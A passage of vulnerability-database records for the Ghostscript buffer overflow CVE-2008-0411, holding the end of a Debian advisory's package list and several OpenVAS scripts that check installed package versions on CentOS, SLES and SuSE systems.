http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_s390.deb\n Size/MD5 checksum: 5534914 49e7a2502e303d21bed0161841af4eec\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_s390.deb\n Size/MD5 checksum: 3083516 91f1ae5ac05b1e17e700f59c66d778f9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_sparc.deb\n Size/MD5 checksum: 5425410 fb7afa7cbfb9f9ba707aeddf5c00ff80\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_sparc.deb\n Size/MD5 checksum: 2947418 d815d67dc78463de966b8c9825c4bcf1\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-02-27T12:17:43", "published": "2008-02-27T12:17:43", "id": "DEBIAN:DSA-1510-1:5BCC7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00074.html", "title": "[SECURITY] [DSA 1510-1] New ghostscript packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-04-09T11:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Check for the Version of ghostscript", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880051", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880051", "type": "openvas", "title": "CentOS Update for ghostscript CESA-2008:0155 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ghostscript CESA-2008:0155 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ghostscript is a program for displaying PostScript files, or printing them\n to non-PostScript printers.\n\n Chris Evans from the Google Security Team reported a stack-based buffer\n overflow flaw in Ghostscript's zseticcspace() function. An attacker could\n create a malicious PostScript file that would cause Ghostscript to execute\n arbitrary code when opened. (CVE-2008-0411)\n \n These updated packages also fix a bug, which prevented the pxlmono printer\n driver from producing valid output on Red Hat Enterprise Linux 4.\n \n All users of ghostscript are advised to upgrade to these updated packages,\n which contain a backported patch to resolve these issues.\";\n\ntag_affected = \"ghostscript on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-February/014731.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880051\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:36:45 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0155\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"CentOS Update for ghostscript CESA-2008:0155 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ghostscript\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-gtk\", rpm:\"ghostscript-gtk~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Check for the Version of ghostscript", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880187", "href": "http://plugins.openvas.org/nasl.php?oid=880187", "type": "openvas", "title": "CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ghostscript is a program for displaying PostScript files, or printing them\n to non-PostScript printers.\n\n Chris Evans from the Google Security Team reported a stack-based buffer\n overflow flaw in Ghostscript's zseticcspace() function. An attacker could\n create a malicious PostScript file that would cause Ghostscript to execute\n arbitrary code when opened. (CVE-2008-0411)\n \n These updated packages also fix a bug, which prevented the pxlmono printer\n driver from producing valid output on Red Hat Enterprise Linux 4.\n \n All users of ghostscript are advised to upgrade to these updated packages,\n which contain a backported patch to resolve these issues.\";\n\ntag_affected = \"ghostscript on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-February/014730.html\");\n script_id(880187);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:36:45 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0155\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64\");\n\n script_summary(\"Check for the Version of ghostscript\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-gtk\", rpm:\"ghostscript-gtk~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libgimpprint-devel\n ghostscript-x11\n ghostscript-serv\n libgimpprint\n ghostscript-fonts-other\n ghostscript-library\n ghostscript-fonts-std\n ghostscript-fonts-rus\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021790 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065147", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065147", "type": "openvas", "title": "SLES9: Security update for Ghostscript", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021790.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Ghostscript\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libgimpprint-devel\n ghostscript-x11\n ghostscript-serv\n libgimpprint\n ghostscript-fonts-other\n ghostscript-library\n ghostscript-fonts-std\n ghostscript-fonts-rus\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021790 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65147\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-0411\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for Ghostscript\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:20:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Check for the Version of ghostscript", "modified": "2017-12-08T00:00:00", "published": "2009-01-23T00:00:00", "id": "OPENVAS:850050", "href": "http://plugins.openvas.org/nasl.php?oid=850050", "type": "openvas", "title": "SuSE Update for ghostscript SUSE-SA:2008:010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2008_010.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for ghostscript SUSE-SA:2008:010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A stack based buffer overflow was fixed in the ghostscript interpreter,\n which can be used to execute code or at least crash ghostscript.\n CVE-2008-0411\n\n This can be exploited for instance by site local users printing to\n a print server which uses ghostscript to raster data, making this a\n remote problem.\n\n Unfortunately this error is not caught by the stack overflow protection\n technologies we use.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"ghostscript on SUSE LINUX 10.1, openSUSE 10.2, openSUSE 10.3, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE Linux Enterprise Desktop 10 SP1, SLE SDK 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850050);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-23 16:44:26 +0100 (Fri, 23 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUSE-SA\", value: \"2008-010\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"SuSE Update for ghostscript SUSE-SA:2008:010\");\n\n script_summary(\"Check for the Version of ghostscript\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-ijs-devel\", rpm:\"ghostscript-ijs-devel~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.4~3.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~178.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~178.2\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~26\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~103\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~103\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDK10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"OES\")) != NULL)\n {\n 